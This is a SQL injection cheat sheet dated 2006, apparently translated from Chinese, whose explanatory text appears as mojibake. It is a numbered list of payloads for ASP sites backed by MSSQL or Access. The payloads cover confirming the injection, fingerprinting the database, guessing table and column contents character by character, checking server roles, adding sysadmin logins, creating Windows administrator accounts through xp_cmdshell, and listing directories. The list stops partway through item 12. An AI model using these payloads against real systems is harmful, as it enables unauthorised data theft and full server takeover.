sqlÊÖ¹¤×¢Èë

SQLÊÖ¹¤×¢Èë´óÈ«
2006Äê08ÔÂ11ÈÕ ÐÇÆÚÎå 21:00
±È·½ËµÔÚ²éѯidÊÇ50µÄÊý¾Ýʱ£¬Èç¹ûÓû§´«½üÀ´µÄ²ÎÊýÊÇ50 and 1=1£¬Èç¹ûûÓÐÉèÖùýÂ˵Ļ°£¬¿ÉÒÔÖ±½Ó²é³öÀ´£¬SQL ×¢ÈëÒ»°ãÔÚASP³ÌÐòÖÐÓöµ½×î¶à£¬
¿´¿´ÏÂÃæµÄ
1.ÅжÏÊÇ·ñÓÐ×¢Èë
;and 1=1
;and 1=2
2.³õ²½ÅжÏÊÇ·ñÊÇmssql
;and user>0
3.ÅжÏÊý¾Ý¿âϵͳ
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4.×¢Èë²ÎÊýÊÇ×Ö·û
'and [²éѯÌõ¼þ] and ''='
5.ËÑË÷ʱû¹ýÂ˲ÎÊýµÄ
'and [²éѯÌõ¼þ] and '%25'='
6.²ÂÊý¾Ý¿â
;and (select Count(*) from [Êý¾Ý¿âÃû])>0
7.²Â×Ö¶Î
;and (select Count(×Ö¶ÎÃû) from Êý¾Ý¿âÃû)>0
8.²Â×Ö¶ÎÖмǼ³¤¶È
;and (select top 1 len(×Ö¶ÎÃû) from Êý¾Ý¿âÃû)>0
9.(1)²Â×ֶεÄasciiÖµ£¨access£©
;and (select top 1 asc(mid(×Ö¶ÎÃû,1,1)) from Êý¾Ý¿âÃû)>0
(2)²Â×ֶεÄasciiÖµ£¨mssql£©
;and (select top 1 unicode(substring(×Ö¶ÎÃû,1,1)) from Êý¾Ý¿âÃû)>0
10.²âÊÔȨÏ޽ṹ£¨mssql£©
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--
11.Ìí¼ÓmssqlºÍϵͳµÄÕÊ»§
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
12.(1)±éÀúĿ¼
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('Éϲ½µÃµ½µÄpaths'))>)
(2)±éÀúĿ¼